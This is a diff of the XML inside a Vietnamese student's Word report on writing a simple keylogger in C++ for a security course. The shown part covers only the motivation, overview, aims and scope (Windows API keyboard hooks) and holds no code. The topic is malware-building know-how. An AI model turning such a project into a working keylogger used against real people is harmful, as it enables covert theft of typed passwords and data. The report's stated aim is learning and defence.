+        <w:t xml:space="preserve"> Do kiến thức của em còn hạn chế, trong project cũng như báo cáo này vẫn còn nhiều thiếu sót, hi vọng sẽ nhận được sự góp ý của thầy để kết quả đạt được qua Project này của em là tốt nhất có thể.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc57761757"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>2. Tổng quan về đề tài</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
         <w:ind w:firstLine="720"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Keylogger – một loại mã độc đánh cắp những giá trị mà người dùng nhập vào từ bàn phím – đã có từ rất lâu đời. Có thể nói đây là loại mã độc xuất hiện sớm nhất, tuy nhiên</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> chúng ngày càng đa dạng và khó nhận biết hơn.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Keylogger có thể viết bằng nhiều loại ngôn ngữ như C,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>C++, Python,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objective </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>C,…</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Điểm chung của các loại ngôn ngữ này là có thể can thiệp sâu vào phần cứng và có thể chạy đa nền tảng.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Có </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>khá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nhiều project từ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> đơn giản cũng như phức tạp về Keylogger</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>trên kho chứa mã nguồn mở khổng lồ github.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Tuy nhiên, những kiến thức về mã độc cũng như cách tạo ra chúng đều là những kiến thức khó, liên quan nhiều đến các kiến thức </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">sâu về mạng máy tính, phần cứng </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hệ điều hành, vì vậy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>có khá ít người muốn nghiên cứu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Những tin tức về mã độc nói chung và Keylogger nói riêng còn chưa cụ thể, người đọc cũng chỉ biết rằng chúng có hại nhưng không nhiều người biết chúng có hại ra sao, chúng thâm nhập như thế nào và </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>cách để phòng chống hiệu quả.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc57761758"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>1. Lý do chọn đề tài</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Chúng ta đang sống trong thời kỳ của kỷ nguyên kỹ thuật số gắn liền với những đột phá về công nghệ, trong đó công nghệ thông tin (CNTT) đóng vai trò là công nghệ cốt lõi. CNTT không chỉ là một ngành kinh tế mà còn là động lực quan trọng để giúp các ngành khác phát triển. Trong tương lai, cách sống, làm việc, sản xuất của con người sẽ được thay đổi mạnh mẽ. Công nghệ mới sẽ sắp xếp lại thị trường lao động, nhiều việc làm truyền thống sẽ mất đi, nhiều công việc mới, cơ hội mới sẽ xuất hiện thay thế.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Song song với những phần mềm, ứng dụng đem lại giá trị lợi ích cho con người thì có những kẻ có dã tâm xấu đã phát triển những phần mềm độc hại đối với máy tính, gọi chung là mã độc. Mã độc rất đa dạng, từ cách thức tấn công, tác hại của chúng cũng như ngôn ngữ lập trình ra chúng.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Sự phát triển của mã độc hiện nay là vô cùng nhanh, đòi hỏi mỗi lập trình viên, những người quản trị hệ thống phải biết cách đối phó và ngăn chặn. Để làm được điều này, việc hiểu cấu trúc và cách thức hoạt động của nó là vô cùng quan trọng. Đối với em, một sinh viên có định hướng theo ngành An toàn thông tin, mã độc là một khía cạnh rất quan trọng bắt buộc phải có kiến thức vững vàng. Vì vậy, sau khi được nhà trường xếp thầy Phạm Huy Hoàng là giảng viên hướng dẫn, em đã quyết định lựa chọn đề tài: “Lập trình một Keylogger đơn giản bằng ngôn ngữ lập trình C++”.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Do kiến thức của em còn hạn chế, trong project cũng như báo cáo này vẫn còn nhiều thiếu sót, hi vọng sẽ nhận được sự góp ý của thầy để kết quả đạt được qua Project này của em là tốt nhất có thể.</w:t>
-      </w:r>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>3. Mục đích nghiên cứu</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2543,22 +5414,91 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Project nghiên cứu cách tạo ra Keylogger, từ đó giúp em học thêm được những công nghệ mới, những kiến thức sâu hơn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Project này sẽ là tiền đề cho Project 2, Project 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> của em</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sau đó.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc57761759"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>2. Tổng quan về đề tài</w:t>
-      </w:r>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>4. Phạm vi nghiên cứu</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2577,16 +5517,34 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Keylogger – một loại mã độc đánh cắp những giá trị mà người dùng nhập vào từ bàn phím – đã có từ rất lâu đời. Có thể nói đây là loại mã độc xuất hiện sớm nhất, tuy nhiên</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> chúng ngày càng đa dạng và khó nhận biết hơn.</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Project này tập trung nghiên cứu vào Windows API, các hàm HOOK, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">những macro liên quan đến </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Keyboard,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2605,40 +5563,37 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Keylogger có thể viết bằng nhiều loại ngôn ngữ như C,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>C++, Python,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Objective C,… Điểm chung của các loại ngôn ngữ này là có thể can thiệp sâu vào phần cứng và có thể chạy đa nền tảng.</w:t>
-      </w:r>
+        <w:t>Project được thực hiện trong vòng 10 tuần kể từ khi quyết định đề tài.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc57761760"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>5. Đóng góp của đề tài</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2657,357 +5612,37 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Có </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>khá</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> nhiều project từ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> đơn giản cũng như phức tạp về Keylogger</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>trên kho chứa mã nguồn mở khổng lồ github.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Tuy nhiên, những kiến thức về mã độc cũng như cách tạo ra chúng đều là những kiến thức khó, liên quan nhiều đến các kiến thức </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">sâu về mạng máy tính, phần cứng </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>và</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hệ điều hành, vì vậy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>có khá ít người muốn nghiên cứu</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Những tin tức về mã độc nói chung và Keylogger nói riêng còn chưa cụ thể, người đọc cũng chỉ biết rằng chúng có hại nhưng không nhiều người biết chúng có hại ra sao, chúng thâm nhập như thế nào và </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>cách để phòng chống hiệu quả.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
+        <w:t>Em làm đề tài này với hi vọng sẽ giúp người đọc hiểu thêm về Keylogger cũng như các loại mã độc khác, để từ đó có biện pháp phòng chống hiệu quả.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc57761761"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>3. Mục đích nghiên cứu</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
